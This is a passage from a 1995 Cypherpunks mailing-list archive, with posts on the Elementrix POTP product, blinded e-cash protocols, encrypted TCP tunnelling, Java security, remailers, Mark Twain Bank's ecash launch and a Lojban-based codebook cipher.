> synchronous.  If any traffic between two parties is lost, they must
> re-synch; keys between each of the parties and other parties will not be
> affected.
> 
> The idea is novel and useful.   It will be resistant against most
> attackers.  It is much less resistant to attacks by nation states that
> could have a record of all traffic among all parties.  Of course it is not
> an OTP nor is it more secure than other modern systems.  If anything, it
> is a little less so, at least against those who have all of the traffic
> and to the extent that more than two parties start with the same initial
> key.  Of course, its strength is to permit all members of the population
> to begin with the same key while ensuring that members of the population
> are safe from each other.  It also ensures that compromise of the initial
> key is not sufficient to read traffic.  One must have all the intervening
> traffic.  Thus, if one comes to the party late, learning the initial key
> will not enable one to read current traffic.
> 
> >OTOH, I saw a press-release on Cypherpunks a week or two back that 
> >claimed Whitfield Diffie and David Kahn had both examined the algorithm 
> >under NDA, and both were blown away by it. OTOOH, I don't know how much 
> >Diffie and Kahn know about TCP/IP.
> 
> Diffie knows enough; Kahn less.  However, both are geniuses and know what
> they need to know.  As to their being "blown away," I tend to doubt it. 
> The idea is useful but not revolutionary.
> 
> >We'll know for sure when they release the details of the spec. And, if 
> >they go to the logical conclusion of all this secrecy and they *don't* 
> >release the spec, it won't be worth a bucket of warm snake oil.
> 
> If they have applied for a patent and if the effectiveness of the scheme
> does not rely upon secrecy of the scheme, then of course there is no
> reason for secrecy.  They sent me an evaluation copy of the program and
> have been fairly open in discussing it.  (No one has suggested an NDA or
> even that there were any secrets involved.)  While for security I would
> rather have Lotus Notes or Secure Exchange, for ease of administration
> this program has advantages.
> 
> The product is interesting and less bogus than your meters might lead you
> to believe.  Few of us would like to have our products evaluated strictly
> on the basis of press releases and reports.
> 
> I believe that the scheme infringes patents of which I am aware.
> 
> 
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 23 Oct 95 13:24:32 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <Pine.SOL.3.91.951022233806.16282B-100000@chivalry>
Message-ID: <199510232023.OAA10038@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Simon Spero" <ses@tipper.oit.unc.edu> 
 allegedly wrote:
>
> I can't remember off hand, but isn't blinding transitive?


Blinding and unblinding is just multiplication and division in
modular arithmetic, right?  So it oughta be transitive, right?
I actually don't know, and I am eager to find out.


 "'Simon Spero'":
>
> If so, there's 
> an obvious way to get two way anonymity with an on-line system. If Alice 
> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
> of the note, each with a serial number known only to Bob, then blind them 
> and send them to Alice. 
> 
> Alice would then reblind them and send them to Nick, the banker. Nick
> would then pick one of the notes, and ask Alice for the blinders for the
> rest. Alice would then ask Bob for his blinders for the rejected notes,
> and would forward both sets on to Nick, who would check them, and if
> they're legit, sign the remaning copy, and return it to Alice.  
> Alice cound then remove her blinding factor, and sent the result on to
> Bob. Bob then removes his blinding factor, and can now spend the coin. 


You mean he can now deposit the note with the bank for credit?  
Although he won't actually deposit it until later, some random 
amount of time after this transaction is finished.
  He *could* give the note to Charles, who would deposit it, but
Charles would not be able to protect his own identity when
accepting it.  Bob might as well just turn it in to the bank.


 "'Simon Spero'":
>
> Since Alice doesn't know the serial number, she can't reveal it to Nick 
> so that he can find out who deposits the coin. Also, since Nick doesn't 
> know the serial number, he can't collaborate with Bob to find out who 
> Alice is. 
> 
> Does this work, or am I missing something?


It sounds good to me.  Bob will check the note for the bank's sig
after he has unblinded it.  Thus he knows that Alice didn't cheat
him.


Can a more astute mathematician than myself evaluate this scheme for
us?


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIv5vfWZSllhfG25AQHlsAP/SL7IxwVQ/J5k3OdbZm/B6GCl/ZpvKgV6
iyaHJKp4p3zGM6rlq9x0mj/hWedxeCgSA9x/ptcMoVY8A5l/wpGPSZhVRrb4/NRV
LDjwGb9g9g3/u5bHsK2dGo1FqnvCa0fBur2TzC07CvAFHlP1hzFPtEsemd1OB7fj
mWToHOYPDKY=
=fFvb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 23 Oct 95 11:48:17 PDT
To: cypherpunks@toad.com
Subject: FV -- What we have learned
Message-ID: <okWy_syMc50eNcPEQV@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse the cross-posting, I'll keep it short.

With my colleagues at First Virtual, I have recently completed what we
intend to be the definitive statement about what FV has learned from a
full year of processing payments over the Internet.  This is not
intended as a puff piece, but a serious academic-style overview.  We're
hoping it will prove to be a valuable resource for anyone trying to
process payments on the net, even those who disagree with some aspects
of FV's approach.  The paper will be presented next week at the
"Frontiers in Electronic Commerce" conference in Austin.  

In Postscript, it's a 14 page paper with a nearly 30 page appendix, so
it doesn't *have* to be a long paper to read unless you want it to be. 
:-)   Plain text and postscript versions are available on the net by
anonymous ftp:
	ftp://ftp.fv.com/pub/nsb/fv-austin.{txt,ps}
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 12:07:01 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: CSP
In-Reply-To: <199510230156.UAA09239@osh1.datasync.com>
Message-ID: <199510231909.PAA17630@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Frosty writes:
>      The Lawsuit, filed Thursday in state Supreme Court, claims AT&T
> residential calls are billed in full minutes, meaning a call lasting one
> minute and one second would be billed as a two-minute call.

This is not at all relevant to the list.

Incidentally, I hope this lawsuit gets laughed out of court. If you didn't
know that calls get billed by the minute, then you must never have glanced
at a phone bill.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 12:13:18 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <199510231915.PAA17647@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> If Netscape wants to claim their product doesn't degrade security, they
> should provide a safe postscript interpreter or not provide hooks to
> unsafe ones.

By the same logic, it might be claimed: "If Netscape wants to claim their
product doesn't degrade security, they should provide a safe Internet or not
provide access to unsafe Internet sites."

I disagree. And yes, I'm arguing in my spare time.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Mon, 23 Oct 95 15:26:47 PDT
To: cypherpunks@toad.com
Subject: Internet Security Review
Message-ID: <C120ZVZQM0OYB*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Internet Security Review
Date: Mon, 23 Oct 1995 15:20:23 PST
A1-type: DOCUMENT
Importance: normal


>Just got a copy via mail today. Boy, Dorothy Denning seriously dings
>Tim May in this issue. Interesting reading to know what the other side
>is up to nonetheless. She uses some reasoning that will be compelling to
>many.

>Doug Hughes				Engineering Network Services
>doug@eng.auburn.edu			Auburn University

Doug,

Could you possibly expand on this a little bit? I don't usually see this
publication.

Thanks!

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@hidden-foes.gateway.com>
Date: Mon, 23 Oct 95 12:38:23 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT:  Digest Version Changes Hosts
Message-ID: <Pine.LNX.3.91.951023153300.5298A-100000@hidden-foes.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


The digest version [cypherpunks-d] of the cypherpunks mailing list has 
been moved to a faster host.

Previously it was under the care of majordomo@gateway.com, but it has 
been moved to the care and feeding of majordomo@hidden-foes.gateway.com.

The new machine has a big more disk, a bit more processor, and is on the 
fast end of a T1 [the other was at my home on the good 'ole shared 28.8k 
SLIP].

ANYWAY---->  If you were subscribed to the digest version already, you 
are still there.  If you would LIKE to subscribe to the digest version, 
just send e-mail to 'majordomo@hidden-foes.gateway.com' with the line 
'subscribe cypherpunks-d' in the BODY.

The digest is created every 40k [or about 2-3 times/day it seems].  
Please let me know directly if there are any problems with this new system.

BTW, the first issue after moving to the new system will be Volume 2, 
Issue 1.

Thanks,
-abc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Mon, 23 Oct 95 14:37:08 PDT
To: cypherpunks@toad.com
Subject: Internet Security Review
Message-ID: <199510232136.QAA26765@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just got a copy via mail today. Boy, Dorothy Denning seriously dings
Tim May in this issue. Interesting reading to know what the other side
is up to nonetheless. She uses some reasoning that will be compelling to
many.

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 23 Oct 95 16:51:20 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510232350.QAA17025@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Simon Spero" <ses@tipper.oit.unc.edu>  wrote:
>> If so, there's 
>> an obvious way to get two way anonymity with an on-line system. If Alice 
>> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
>> of the note, each with a serial number known only to Bob, then blind them 
>> and send them to Alice. 
>> 
>> Alice would then reblind them and send them to Nick, the banker. Nick
>> would then pick one of the notes, and ask Alice for the blinders for the
>> rest. Alice would then ask Bob for his blinders for the rejected notes,
>> and would forward both sets on to Nick, who would check them, and if
>> they're legit, sign the remaning copy, and return it to Alice.  
>> Alice cound then remove her blinding factor, and sent the result on to
>> Bob. Bob then removes his blinding factor, and can now spend the coin. 

This is an interesting idea but it is more complicated than necessary, I
think.  The denomination can be carried in the exponent, in which case
there is no need for cut and choose and nobody can cheat the bank.  A
coin suitable for deposit is a signed number of some special form.  To
pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
gives her a blinded coin, which she reblinds and gives to the bank.  The
bank signs it (debiting Alice's account) and gives it back to her.  She
strips off her blinding and gives it to Bob.  He strips off his own
blinding and verfifies that he is left with a signed number of the
appropriate form.

This system is in some ways the inverse of regular ecash.  Instead of
Alice withdrawing a coin ahead of time, and Bob checking it with the bank
right away, it is Alice who does the bank interaction at payment time,
and Bob who waits before interacting with the bank.  The computational
and communications costs do not seem much worse than ecash.

There is no way Alice can double-spend because she cannot anticipate
Bob's blinding factor and give him a previously-spent coin which will
unblind to the proper form.  There could be an issue of fraud, though,
where Bob insists that Alice's coin was no good even though it actually
was.  Since he has blinded it she will have no way of recognizing it when
he eventually deposits it.  In the current system this does not arise as
Alice can always give him another copy of the coin and prove that it is
good, and she can further determine if Bob has deposited it.  So some of
the trust in the bank necessary with regular ecash gets replaced by trust
between payee and payor in Simon Spero's system.

Still, I think this scheme has considerable merit and is worth exploring
further.  It seems to provide superior privacy protection over Chaum's
ecash.  The fraud issue can perhaps be dealt with by reputations and
credentials as we have often discussed.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 23 Oct 95 01:58:45 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510230100.DAA00697@soikko.cs.hut.fi>
Message-ID: <Pine.LNX.3.91.951023161515.27409A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Tatu Ylonen wrote:

> > an ETT client and an ETT server, using Diffie-Hellman and DSA for
> 
> You are aware that RSADSI claims they have exclusive licensing rights
> for DSA?

Adding MD5 support wouldn't be a bad idea. Same for algorithms 
alternative to Blowfish (3DES etc.) and DH (e.g., with Elliptic 
functions-based key exchange), all automatically negotiated at connection 
time.

> Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
> the features that you are planning.

I think that Wei's idea is for something more general, similar to the
CryptoTCP 0.9 posted a few months ago by ModX and available from 
ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/ctcp.0.9.tar.gz
(that one used unauthenticated DH key exchange and 3DES, IMHO with a 
highly questionable PRNG for the generation of the session key).

It would be enormously more useful and popular if someone could write a
Winsock redirector loadable after WINSOCK.DLL but before any Winsock
application, hooking the API functions used to open TCP connections. That
would mean instant transport-level crypto capability for most Winsock
apps, just like NEC's SocksCap provides instant SOCKS (alas, V.4)
compliance. 

Also Perry's invitation to join the IPSEC effort should be given proper
attention (I would do it, if only my spare time were not in such short
supply). I would try to implement it on SLiRP, a free SLIP/PPP simulator
largely based on BSD TCP/IP code (but running in user mode). That would
allow to experiment without having to hack the kernel, and would have a
practical value for converting conventional login accounts into
IPSEC-compliant SLIP/PPP accounts (instant crypto, again). Networking
technologies gain much faster popularity once a critical mass of users
actually use them. And to reach that mass, we must enlist all the 
non-techies who just run unmodified Windows applications.

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Mon, 23 Oct 95 14:21:12 PDT
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199510232119.RAA15716@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02110101acaf51651ef9@[204.156.156.4]>,
Todd Glassey <todd@lgt.com> wrote:
[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
> Pardon the flame but I really have just about heard enough of this BS...
[...]
> >> The area where we can (must) build trust is the computing base.
> >> Traditionally, this has been the OS, but in the case of java, it is
> >> the java interpreter (such as netscape 2.0 and hotjava).  The browser
> >>  is now the TCB (trusted computer base) for all practical purposes...
> >
> >Read: The Java interpreter is supposed to be a TCB.
[...]
> >Who here truly believes that the implementations of Java meet the
> >requirements of a TCB?
[...]
> Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava.
[ ... flame deleted ... ]


No, here I think Dr. Cohen's comments are right on the mark.

The Java interpreter *is* supposed to be a trusted computing base.
Do we have any reason to believe that this trust is well-placed?

(If you don't agree, go through the Orange Book evaluation criteria,
and pay special attention to the assurance sections...)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
=UZH0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 17:25:54 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510232235.SAA26441@opine.cs.umass.edu>
Message-ID: <199510240020.RAA24876@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	With the release of digicash I hope that we can soon make this
stuff for-pay and much of the spam problem will be fixed. (Not all of
it, of course.)
	(I am rather hesitatnt to setup an account with Mark Twain
though.. $2,500 min balance and not FDIC insured?)


> 
> Lance Cottrell writes:
> > I think one solution to this problem is to encourage (require) the use of
> > pseudonym servers. Having a server like alpha as the entity on the from
> > line has several advantages.
> > 
> > 1) Less Spam since it takes some effort to set up the nym and it will be 
> > taken away as soon as the spam starts.
> 
> I fear this will be a short-lived gain. User-friendly scripts for 
> establishing pseudonymous accounts are pretty easy to write. They may be
> beyond the average Fast Money Maker, but I expect myself and others will be
> putting them out on the Net for general consumption. 
> 
> I can certainly imagine one of those scripts being expanded to automatically 
> create salesdroid001@nymsrus.org, ..., salesdroid999@nymsrus.org and emitting 
> the same spam once from each pseudonym to a different destination. You would
> want to apply a statistical spam filter (of the kind mentioned recently by
> Greg Broiles) to the entire output of each pseudonymizer in an attempt to
> nip such spams in the bud.
> 
> Semi-permanent account status confers privileges to the user, IMHO. I
> believe a pseudonymous account ideally should be treated the same as a 
> regular account on an ISP. For example, an admin will not unilaterally close 
> an account upon receiving a single complaint about the account user. 
> Certainly I don't know of an ISP that routinely blocks its users' accounts
> from sending mail to selected other accounts. Lest I seem too presumptuous, 
> let me say that I realize all immediately foreseeable pseudonymizers are
> free services. Clearly these service providers can set whatever policies they
> wish, and are not directly competing with the fee-charging ISPs. Perhaps 
> future fee-charging pseudonymizers will consider these criteria in offering 
> enhanced services.
> 
> -Futplex <futplex@pseudonym.com>
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 23 Oct 95 09:39:44 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510231749.A23074-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Rev. Mark Grant wrote:

> I suspect that I could easily hack this into Mixmaster in a day or two,

Ok, I have an initial version that works on single-packet messages (there
seems to be a lot of code duplication for multi-packet messages), and
ought to have it finished off and tested by the end of the week. I doubt
I'll be able to set up such a remailer, but I'll release a patch for 2.0.2
and hopefully Lance can incorporate it into the next release as a
compile-time option. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kawika Daguio <KDAGUIO@aba.com>
Date: Mon, 23 Oct 95 14:56:12 PDT
To: cypherpunks@toad.com
Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD -Reply
Message-ID: <s08bd782.015@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


Sir,

I am still lurking on the Information Railroad(TM)
I am still trying to preserve privacy while maintaining
accountability for all parties.  Technical solutions are
insufficient, no matter how innovative.  

My greatest problem today is the lack of sophistication of
decisionmakers.  Very few people understand the technology,
economics, and politics of electronic commerce.  Keeping governments
from making the wrong decisions is difficult.  Keeping bankers from
doing the same is even more difficult.  Most of the discussion occurs
between bank marketing and R&D types.  Compliance, operations,
security, risk management, and legal counsel units within banks are
often uninformed about the efforts of the technology delivery groups.

It is also difficult to offer financial services to the new world. 
It is not easy to "know your customer," evaluate risks, and price the
risks when you cannot verify their identity or reach them easily. 
Bankers prefer orderly environments to anarchy.  So do governments.

      ****Extremely Personal Observation*****
So do I.  I like privacy, I do not need true anonymity nor do I wish
to engage in significant interaction or be exposed to anonymous
persons.
IF SOMEONE WEARING A HOOD OR A MASK COMES TO MY DOOR
THEY WILL BE AUTOMATICALLY VIEWED AS AN IMMEDIATE THREAT.
I may classify non-anonymous persons as threats after evaluating
available information.  Banks and governments will similarly look
askance at those who wish to wear masks when engaging in commerce.

Respectfully, 
Kawika Daguio

THE ABOVE ARE MY PERSONAL OBSERVATIONS
NO ONE IN SHOULD ATTRIBUTE THE SENTIMENTS
EXPRESSED TO THE ASSOCIATION OR OUR MEMBERS.



>>> Timothy C. May <tcmay@got.net>  10/22/95, 11:19pm >>>

I saw this on the Cyberia list. Those of you near Washington, D.C.
may find this worth attending.

By the way, one of the speakers, Kawika Daguio, was once on this list
(and may still be, though I haven't seen posts from him in a while).

--Tim May



>Date: Sun, 22 Oct 1995 17:04:32 -0400
>Errors-To: thardy@mail.wm.edu
>Reply-To: cyberia-l@warthog.cc.wm.edu
>Originator: cyberia-l@listserv.cc.wm.edu
>Sender: cyberia-l@warthog.cc.wm.edu
>Precedence: bulk
>From: "Cleveland Thornton" <thornton@legalbits.com>
>To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
>Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
>X-Listserver-Version: 6.0 -- UNIX ListServer by Anastasios
Kotsikonas
>
>
>For those in the Washington, DC area, you may find the following
>meeting of interest,
>
>
>
>------- Forwarded Message Follows -------
>Date:          Sat, 21 Oct 1995 21:54:36 -0400 (EDT)
>From:          Andrew Grosso <agrosso@access.digex.net>
>To:            Cleveland Thornton <cthornto>
>Subject:       Please Post
>
>                THE FUTURE OF MONEY:
>       DIGITAL CASH IN AN ELECTRONIC WORLD
>
>        The evolution of money has now completed
>a one hundred eighty degree turn from the point
>where our economy began: from a barter marketplace;
>to paper currency; and, today, to pure information
>exchanged globally over telecommunications lines.
>Money is digital, and can be created, utilized,
>and transmitted by individuals and companies, as
>well as by governments.
>
>        On Thursday, November 2, at noon, the
>Computer Crime Subcommittee of the ABA will host
>a luncheon program which will examine the birth
>and promise of digital cash.  The speakers repre-
>sent all three of the important organizations
>participating in this venture: designers, bankers,
>and governments:
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 23 Oct 95 18:07:22 PDT
To: (Recipient list suppressed)
Subject: Mark Twain Bank (was: Anonymity: A Modest Proposal)
Message-ID: <v02120d07acb1f3d69b57@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



First of all, those who have looked over the MT Bank stuff all
know that they are clearly off to a very shaky start. I know of
three guys that could have done a _much_ more professional job,
almost a year ago. Unfortunately we were rejected by Chaum as
insufficiently respectable. So now we get a service that is
lame, confusing and expensive -- at least at the bank end.

Chaum apparently continues to suffer from the belief that he
needs a real bank to issue e-cash. Well, MT Bank is a real bank,
but they have managed to violate at least one major Federal Reserve
requirement (accounts in the ECash mint are clearly demand deposit
accounts -- it would have been trivial to define them differently
but somebody apparently wasn't thinking.) A technically-oriented NBFI
could have done a much better job, without a lot of the "real bank"
baggage, such as minimum deposits ($250, not $2,500, but still
pretty steep for someone wanting to spend $.10 on something.) My
understanding is that the _bank account_ is FDIC insured, but not
the ECash. I could be wrong -- their materials are extremely confusing
and hard to follow.

As one of my co-workers said today, "It will be interesting to sit
back and watch them take regulatory mortar fire." Indeed.

I'm really hoping that they pull their act together -- I've already
sent in my account application -- but things look really grim at
the moment. There are certainly a lot of projects list members are
working on that would be greatly enhanced by functioning, popular
e-cash. I encourage everyone to give them lots of helpful feedback
so that they can turn this around.

On another note, I'm hoping that some of you will also bite the
bullet, get accounts, and join me attempting to win valuable
prizes in Sameer's "Hack Digicash" promotion. I'd rather see one
of us find holes in this than see the whole thing melt into the
ground.

This extremely unprofessional, bungled launch does, I admit, make
Mondex (with scads of beautiful marketing literature) look better all
the time, although based on some conversations on Sunday, it appears
that they may have _extremely serious_ architectural security problems.
We'll see how things play out.

Later,

Doug

>        With the release of digicash I hope that we can soon make this
>stuff for-pay and much of the spam problem will be fixed. (Not all of
>it, of course.)
>        (I am rather hesitatnt to setup an account with Mark Twain
>though.. $2,500 min balance and not FDIC insured?)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 23 Oct 95 15:07:40 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: "power one time pad"
In-Reply-To: <doug-9509231532.AA014714381@netman.eng.auburn.edu>
Message-ID: <9510232207.AA15919@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This is the most confusing part of the whole thing.. How does it get started.
>unfortunately, as this is embroiled in non-disclosure and patent-pending,
>we're not going to know, but are forced to take the word of experts such
>as David Kahn that it works as advertised.

Has David Kahn made such a statement? Where can I read the context in which it 
was made? Kahn is a historian of cryptography, not a cryptographer. 

On the basis of the documents made avaliable to me it looks like the standard 
linear feedback sequence generator hack. It does not appear to be a one time pad 
system in anything but name.


>Yes, I and a friend of mine were the only two people in the audience
>that were not Journalists.  It does look rather intruguing, but so much
>negativism is flying about, that most people have dismissed it out of hand.

Often the best thing to do. I don't know who designed POTP nor what they created 
but if I use it and it fails I take the risk. Note that in the Mondex case if it 
fails Mondex take the hit.


As a final point one the security of one time pads is only guaranteed as long as 
the pads are never reused in any sense whatsoever. The system is exceptionaly 
fragile, the slightest breach of secuirty can destroy it, consider the Venona 
decrypts for example.

I'm thinking of writing a paper "How One Time Pads Fail" to discuss failures of 
"unbreakable systems". I have some new material on how to copy the Venona 
cracking method and also plan to analyse POTP and a few other alledged one time 
pad systems. If anyone knows of other alledged one time pad systems that weren't 
please email me and I'll include them.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Oct 95 18:15:24 PDT
To: "Dana W. Albrecht" <cypherpunks@toad.com
Subject: Re: Info: Elementrix POTP
Message-ID: <acb18bb35e021004a6ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I just saw a glaring error in this article which Dana forwards to us which
needs correcting:

At 9:19 PM 10/23/95, Dana W. Albrecht wrote:
>Forwarded from sci.crypt:
>
>In article <45t9oh$6vd@newsbf02.news.aol.com>, whmurray@aol.com (WHMurray)
>writes:
>> In article <45qkp5$8rh@netaxs.com>, grendel@netaxs.com (Michael Handler)
>> writes:


>> >OTOH, I saw a press-release on Cypherpunks a week or two back that
>> >claimed Whitfield Diffie and David Kahn had both examined the algorithm
>> >under NDA, and both were blown away by it. OTOOH, I don't know how much
>> >Diffie and Kahn know about TCP/IP.
>>
>> Diffie knows enough; Kahn less.  However, both are geniuses and know what
>> they need to know.  As to their being "blown away," I tend to doubt it.
>> The idea is useful but not revolutionary.

It was Winn Schwartau, not Whit Diffie, who gave the rave review.

Schwartau wrote the book "Information Warfare," as well as a novel about
hacking, and is not a professional cryptologist.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 16:34:41 PDT
To: cypherpunks@toad.com
Subject: A secure cryptosystem with a 40-bit key?
Message-ID: <199510232334.TAA11134@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been reading a bit recently on constructed languages like
Esperanto.  I came across one that developed out of something called
"LOGLAN" that was published in Scientific American in the early
sixties.  The current active project is called "Lojban".  It has one
really curious property that gave me an idea for an interesting
symmetric-key cryptosystem.

All "native" Lojban words are of entirely predictable forms.  "Root"
words are all five characters containing three consonants and two
vowels in one of two patters (CCVCV and CVCCV).  "Structure" words have
four forms (VV, CV, CVV, and CV'V).  "Combining forms" have two forms
(CVC and CV'C).  All other words are not "native" words (being either
proper names or borrowed words).  The upshot of this is that there is a
fixed limit on the size of the Lojban dictionary of 249500 words (given
17 consonants and five vowels).

The grammar of the language is *so* regularized that they are able to
give a YACC description for it.

A message written entirely using native Lojban words can be encrypted
in a codebook fashion where the particular codebook to be used is a
permutation of the dictionary represented by an 40-bit number (18 bits
to permut the "root word" list, 10 bits for the "structure word" list,
and 12 bits for the "combining form" list).

This system has the interesting property that *any* plaintext with the
same grammatical structure is a potential encryption of a given
cyphertext.  This is similar to some more usual cryptosystems which
operate at the lexical level but which are designed to create this
effect, but has the curious side effect that it is *very* easy to
determine a false-key which makes the transmitted message say nearly
anything you want, thus making mandatory key escrow systems
irrelevant.

When you want to send the message "attack at dawn", you devise a
grammatically identical message, "party 'til you puke" (which is
grammatically identical in Lojban), generate a random key, as well as
the key representing a similar permutation, but with "attack" and
"party" exchanged, "puke" and "morning" exchanged, and so forth.
Transmit the message with the false key in the LEAF field (or report it
to your government-approved escrow agency) and government eavesdroppers
get the wrong message.  Other eavesdroppers get a grammatically
correct, but apparrently nonsensical message ("drink by brick").

There's still the problem of borrowed words and proper names, which
remain problems in any codebook approach, but represents a small
portion of the language, and the words which represent individual
letters are part of the "structure words" category, and could be sent
spelled-out.

This works well in Lojban because it never changes word forms based on
grammatical usage.  Most natural language declensions and conjugations
would make the encrypted message ungrammatical, and make it *much* more
difficult to determine a false key for the LEAF field.  The irregularity
of word forms makes the dictionary much more complicated, too.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 15:45:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb027040402100417fa@[137.110.24.250]>
Message-ID: <199510232235.SAA26441@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:
